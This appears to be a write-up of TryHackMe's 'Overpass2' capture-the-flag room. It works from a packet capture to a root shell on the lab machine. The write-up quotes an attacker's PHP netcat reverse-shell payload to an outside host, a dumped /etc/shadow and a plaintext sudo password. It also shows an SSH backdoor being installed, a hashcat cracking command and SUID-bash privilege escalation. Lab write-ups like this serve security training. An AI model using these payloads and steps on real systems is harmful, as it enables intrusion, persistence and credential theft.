# TryHackMe Ovrpass2 writeup

[Overpass2](https://tryhackme.com/room/overpass2hacked) is the seventh machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.

# **PCAP analysis**

That is an unusual type of machine for me. We got the `.pcap` file with the network dump.

There are few ways to work with `.pcap` files.

If you work with `.pcap` files occasionally, you are probably using the `Wireshark`.

Download the `.pcap` file to your system and open it with `Wireshark`.

It might look overwhelming, but it not so hard to get used to it after all.

If you never worked with `.pcap` files before - it is a format for capturing the network traffic. The first packets will be placed at the top, and you can scroll down the main window to see other packets.

One of the main features of the `Wireshark` is the ability to `follow streams`. That will transform the content of the file into a more readable format.

`Wireshark` has tons of features, you should explore it!

The interesting part for us started from the `POST` request to the `/development/upload.php` page. You can use the `Follow HTTP stream` feature to read details.

We can find this command in the body of the `POST` request:

```bash
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
```

The attacker is spawning the reverse shell to the IP address `192.168.170.145` on the port `4242`.

We can also notice that the attacker is using `nc` as a communication point, and we know that `nc` transferring all data as a clear text. That means we will be able to read everything that happened on the machine, including all commands, provided passwords, etc.

You can scroll the dump a bit and follow another stream started from packet number 32. It’s a `TCP` packet, so you can use the `Follow TCP Stream` feature of the `Wireshark`.

```bash
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
```

The first thing that the attacker did - upgrade the shell to `Fully Interactive TTY` with `python`.

The next thing that we can use later is the password for user `james` right in the stream (it was transferred in a clear text, remember?).

```bash
james@overpass-production:~$ sudo -l
sudo -l
[sudo] password for james: whenevernoteartinstant

User james may run the following commands on overpass-production:
    (ALL : ALL) ALL
```

We can also see that the attacker has the dump of `/etc/shadow`

```bash
james@overpass-production:~$ sudo cat /etc/shadow

james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
```

Feel free to crack those hashes! *wink*

The attacker also established a `ssh` backdoor:

```bash
james@overpass-production:~$ git clone https://github.com/NinjaJc01/ssh-backdoor

james@overpass-production:~/ssh-backdoor$ ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
```

That’s all we need to know.

---

# **Analyze the code**

It’s a good idea to clone the repo and look around.

The file `main.go` contains the original hash for the backdoor and hardcoded [salt](https://en.wikipedia.org/wiki/Salt_(cryptography)).

From the `.pcap` file we know that the attacker used `6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed` hash, and from the repo we know that hardcoded salt is `1c362db832f3f864c8c2fe05f2002a05`. Now you can combine it in the format `hash:salt`, and crack it!

The syntax for `hashcat`, for instance. You can use other tools if you want.

```bash
hashcat -m 1710 -a 0 -o password.txt hash.txt /usr/share/wordlists/rockyou.txt
```

---

# **Get back in!**

Now we have everything that might be needed to exploit the machine one more time.

As we already know all details about the backdoor, so we can use it as a shortcut and not re-exploit the machine from the scratch.

Note that `ssh` is running not on default port `22`.

```bash
ssh -p 2222 james@10.10.147.82
```

Use the password that you just cracked to login.

---

# **PrivEsc**

Privilege escalation is simple this time.

Let’s look around:

```bash
james@overpass-production:/home/james$ ls -la

total 1136
drwxr-xr-x 7 james james    4096 Jul 22 03:40 .
drwxr-xr-x 7 root  root     4096 Jul 21 18:08 ..
lrwxrwxrwx 1 james james       9 Jul 21 18:14 .bash_history -> /dev/null
-rw-r--r-- 1 james james     220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 james james    3771 Apr  4  2018 .bashrc
drwx------ 2 james james    4096 Jul 21 00:36 .cache
drwx------ 3 james james    4096 Jul 21 00:36 .gnupg
drwxrwxr-x 3 james james    4096 Jul 22 03:35 .local
-rw------- 1 james james      51 Jul 21 17:45 .overpass
-rw-r--r-- 1 james james     807 Apr  4  2018 .profile
-rw-r--r-- 1 james james       0 Jul 21 00:37 .sudo_as_admin_successful
-rwsr-sr-x 1 root  root  1113504 Jul 22 02:57 .suid_bash
drwxrwxr-x 3 james james    4096 Jul 22 03:35 ssh-backdoor
-rw-rw-r-- 1 james james      38 Jul 22 03:40 user.txt
drwxrwxr-x 7 james james    4096 Jul 21 01:37 www
```

There is a hidden `.suid_bash` binary with the `SUID` bit!

You can run it in order to get root, but keep in mind that you will need to specify the `-p` flag to allow the `SUID` bit to affect your privileges.

```bash
james@overpass-production:/home/james$ ./.suid_bash -p
.suid_bash-4.4# whoami
root
```

---

# **Takeaway**

* The ability to analyze dumps and logs can be priceless
    
* The whole process of going through this machine is like reading a writeup, you can learn a lot from it.
